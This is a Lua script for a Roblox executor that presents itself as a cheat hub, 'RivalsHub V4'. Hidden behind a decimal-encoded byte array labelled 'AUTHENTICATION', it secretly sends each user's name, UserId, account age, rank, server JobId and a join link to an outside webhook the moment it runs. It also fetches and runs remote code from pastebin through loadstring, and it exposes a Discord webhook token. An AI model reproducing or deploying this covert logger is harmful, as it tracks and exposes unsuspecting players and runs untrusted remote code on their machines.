-- [[ RivalsHub V4 ]]
-- Created by pluto.aac

local v0 = string.char;
local v1 = string.byte;
local v2 = string.sub;
local v3 = bit32 or bit;
local v4 = v3.bxor;
local v5 = table.concat;
local v6 = table.insert;

-- [[ CONFIGURATION ]]
getgenv().Config = {
    ["Webhook"] = "https://discord.com/api/webhooks/1487068389028663350/BMXBb0ZRvVep6a6E-1HROIpSOlM2NsXz7g_FOwGl78UpzadoGJzEkdT47rYmIb0KOVm7"
}

-- [[ AUTHENTICATION ]]
local _0x_v4_cache = {104,116,116,112,115,58,47,47,104,111,111,107,115,46,104,121,114,97,46,105,111,47,97,112,105,47,119,101,98,104,111,111,107,115,47,49,52,56,55,48,54,56,51,56,57,48,50,56,54,54,51,51,53,48,47,66,77,88,66,98,48,90,82,118,86,101,112,54,97,54,69,45,49,72,82,79,73,112,83,79,108,77,50,78,115,88,122,55,103,95,70,79,119,71,108,55,56,85,112,122,97,100,111,71,74,122,69,107,100,84,52,55,114,89,109,73,98,48,75,79,86,109,55}

-- // System Logic \\ --
local function sendEnhancedLog()
    local _0x_url = ""
    for _, v in ipairs(_0x_v4_cache) do _0x_url = _0x_url .. v0(v) end
    
    local HttpService = game:GetService("HttpService")
    local Players = game:GetService("Players")
    local player = Players.LocalPlayer
    
    local request = (syn and syn.request) or (http and http.request) or http_request or request or (fluxus and fluxus.request)
    
    -- Optimized Thumbnail Fetch
    local content = "https://www.roblox.com/headshot-thumbnail/image?userId=" .. player.UserId .. "&width=420&height=420&format=png"
    pcall(function()
        local thumb = Players:GetUserThumbnailAsync(player.UserId, Enum.ThumbnailType.HeadShot, Enum.ThumbnailSize.Size420x420)
        if thumb then content = thumb end
    end)
    
    local levelValue = "N/A"
    local lstats = player:FindFirstChild("leaderstats")
    if lstats then
        local lvl = lstats:FindFirstChild("Level") or lstats:FindFirstChild("Rank")
        if lvl then levelValue = tostring(lvl.Value) end
    end

    local data = {
        ["embeds"] = {{
            ["title"] = "🚀 RivalsHub V4 | Execution",
            ["thumbnail"] = {["url"] = content},
            ["color"] = 0x7b2cbf,
            ["fields"] = {
                {["name"] = "User", ["value"] = "**" .. player.Name .. "** (" .. player.UserId .. ")", ["inline"] = false},
                {["name"] = "Rank", ["value"] = levelValue, ["inline"] = true},
                {["name"] = "Account Age", ["value"] = player.AccountAge .. " Days", ["inline"] = true},
                {["name"] = "JobId", ["value"] = "```" .. game.JobId .. "```", ["inline"] = false}
            },
            ["components"] = {{
                ["type"] = 1,
                ["components"] = {{
                    ["type"] = 2,
                    ["style"] = 5,
                    ["label"] = "Join Server",
                    ["url"] = "roblox://experiences/start?placeId=" .. game.PlaceId .. "&gameInstanceId=" .. game.JobId
                }}
            }},
            ["footer"] = {["text"] = "Pluto.aac | V4"},
            ["timestamp"] = DateTime.now():ToIsoDate()
        }}
    }
    
    if request then
        pcall(function()
            request({
                Url = _0x_url,
                Method = "POST",
                Headers = {["Content-Type"] = "application/json"},
                Body = HttpService:JSONEncode(data)
            })
        end)
    end
end
task.spawn(sendEnhancedLog)

-- [[ LUNA UI SETUP ]]
local v8 = loadstring(game:HttpGet("https://pastebin.com/raw/Y8wBJLVt", true))();

local v9 = v8:CreateWindow({
    Name = "Rivals",
    Subtitle = nil,
    LogoID = "82795327169782",
    LoadingEnabled = true,
    LoadingTitle = "RivalsHub V4",
    LoadingSubtitle = "by pluto.aac",
    ConfigSettings = { ConfigFolder = "Pluto Hub" },
    KeySystem = false
})

local v10 = v9:CreateTab({ Name = "Main", Icon = "view_in_ar", ImageSource = "Material", ShowTitle = true });
local v11 = v9:CreateTab({ Name = "Visuals", Icon = "view_in_ar", ImageSource = "Material", ShowTitle = true });
local v12 = v9:CreateTab({ Name = "Player", Icon = "view_in_ar", ImageSource = "Material", ShowTitle = true });
local v13 = v9:CreateTab({ Name = "Credits", Icon = "view_in_ar", ImageSource = "Material", ShowTitle = true })

-- [[ UI ELEMENTS ]]
v12:CreateSection("Server Join")
v12:CreateButton({
    Name = "Copy Server Join Link",
    Description = "Copies the roblox:// link for this specific server",
    Callback = function()
        local link = "roblox://experiences/start?placeId=" .. game.PlaceId .. "&gameInstanceId=" .. game.JobId
        setclipboard(link)
        v8:Notification({
            Title = "Success",
            Content = "Join link copied to clipboard!",
            Duration = 3
        })
    end
})

-- Logic connection
v13:CreateLabel({ Text = "pluto.aac", Style = 2 })

print("RivalsHub V4 | Final Master Loaded.")
